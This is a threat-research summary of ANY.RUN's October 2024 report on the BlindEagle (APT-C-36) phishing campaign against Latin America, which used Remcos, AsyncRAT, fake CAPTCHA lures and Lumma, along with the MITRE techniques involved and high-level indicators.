Threat Research

October 2024: Recent Cyber Attacks Identified by ANY.RUN

AnyRun

ANY.RUN’s October 2024 roundup highlights the BlindEagle (APT-C-36) campaign targeting LATAM via phishing and Remote Access Tools like Remcos and AsyncRAT, with additional campaigns using fake CAPTCHA prompts and encoded JavaScript to deliver payloads. It also notes how trusted services (Discord, Google Drive, Bitbucket, Pastee, YDRAY) are used to bypass filters and deliver malicious content. Hashtags: #BlindEagle #APT-C-36 #Remcos #AsyncRAT #Lumma #LATAM

Keypoints

  • APT-C-36 (BlindEagle) targets the LATAM region with phishing to gain remote control over devices.
  • The group uses trusted online services (Discord, Google Drive, Bitbucket, Pastee, YDRAY) to deliver payloads and bypass security filters.
  • Phishing campaigns include fake court hearing invitations to lure victims into downloading malicious payloads.
  • Remcos and AsyncRAT are the primary Remote Access Tools used for remote access.
  • Fake CAPTCHA prompts are used to trick victims into executing malicious PowerShell scripts.
  • Encoded JavaScript files are used to conceal malware and evade detection.
  • ANY.RUN provides Threat Intelligence Lookup and an interactive sandbox to analyze threats.

MITRE Techniques

  • [T1566] Phishing – Attackers send emails that appear legitimate to trick users into downloading malware. – ‘Attackers send emails that appear legitimate to trick users into downloading malware.’
  • [T1219] Remote Access Tools – Utilizes tools like Remcos and AsyncRAT to gain unauthorized access to victims’ systems. – ‘BlindEagle use Remcos and AsyncRAT as their primary tools for remote access.’
  • [T1086] PowerShell – Malicious PowerShell scripts executed by users tricked into running them. – ‘Malicious PowerShell scripts executed by users tricked into running them.’
  • [T1027] Obfuscated Files or Information – Use of encoded JavaScript files to hide malicious intent and evade detection. – ‘Use of encoded JavaScript files to hide malicious intent and evade detection.’
  • [T1071.001] Web Protocols – Remcos RAT connection attempting communication with a Command and Control (C2) server. This activity involves establishing TLS connection to an external server. – ‘Remcos RAT connection attempting communication with a Command and Control (C2) server. This activity involves establishing TLS connection to an external server.’

Indicators of Compromise

  • [Executable] Remcos – primary RAT used for remote access in BlindEagle campaigns. – Remcos
  • [Executable] AsyncRAT – used alongside Remcos for remote access. – Remcos and AsyncRAT as their primary tools for remote access
  • [Malware] Lumma – delivered via fake CAPTCHA campaigns. – Lumma
  • [Process Name] OUTLOOK.EXE – used as a filter/indicator in Threat Intelligence Lookup queries. – commandLine:”OUTLOOK.EXE”
  • [Archive Tool] WinRAR – used as part of payload packaging / archiving. – commandLine:”WinRAR”
  • [Network] TLS/C2 Communication – RATs establishing a TLS-enabled channel to a C2 server. – Remcos RAT connection attempting communication with a C2 server; TLS connection to an external server

Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/cyber-attacks-october-2024/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint